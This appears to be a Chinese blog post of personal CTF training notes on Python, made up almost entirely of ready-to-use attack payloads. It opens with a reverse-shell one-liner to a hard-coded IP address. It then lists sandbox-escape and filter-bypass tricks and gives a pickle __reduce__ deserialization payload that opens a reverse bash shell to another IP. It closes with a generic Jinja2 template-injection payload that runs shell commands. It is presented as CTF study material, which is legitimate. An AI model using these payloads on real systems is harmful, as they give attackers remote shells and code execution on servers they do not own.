0%

CTF特训营-笔记(python)

前言

笔记

python反弹shell

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.247.76.60",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

沙箱逃逸

1
2
3
import os
os.system('ifconfig')
os.popen('ipconfig').read()
1
2
3
import commands #Linux python2
commands.getoutput('ifconfig')
commands.getstatusoutput('ifconfig')
1
2
3
4
import subprocess
subprocess.call(['ipconfig'],shell=True)
import timeit
timeit.timeit("__import__('os').system('whoami')", number=1)
1
2
3
4
5
6
import platform

platform.os.system("ls")

platform.popen('whoami', mode='r', bufsize=-1).read()

1
2
3
import pty

pty.spawn("ls")
1
2
3
import cgi

cgi.os.system('ls')

1.禁用import os

1
2
3
4
5
import  os

import os

import os

2.过滤空格

1
2
3
4
5
__import__('os').system("ls")

import importlib

importlib.import_module('os').system('ls')

3、过滤import

1
2
3
4
5
python2:

execfile('/usr/lib/python2.7/os.py')

system('ls')

4、过滤os

1
2
3
4
5
6
7
__import__('so'[::-1]).system('ls')

b = 'o'

a = 's'

__import__(a+b).system('ls')

5、使用exec或者eval

1
2
3
eval(')"imaohw"(metsys.)"so"(__tropmi__'[::-1])

exec(')"imaohw"(metsys.so ;so tropmi'[::-1])

6、恢复 sys.modules

如何禁用:

1
2
3
4
5
sys.modules['os'] = 'not allowed'

import os

os.system('ls')

恢复:

1
2
3
4
5
del sys.modules['os']

import os

os.system('ls')

7、过滤system函数

1
2
3
print(os.system('whoami'))

print(os.popen('whoami').read())

反序列化SHELL

1
2
3
4
def __reduce__(self):
s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.102.118.76",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""

return (os.system, (s,))

万能tssi

1
2
3
4
5
6
7
8
9
10
11
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("ls /").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
坚持原创技术分享,您的支持将鼓励我继续创作!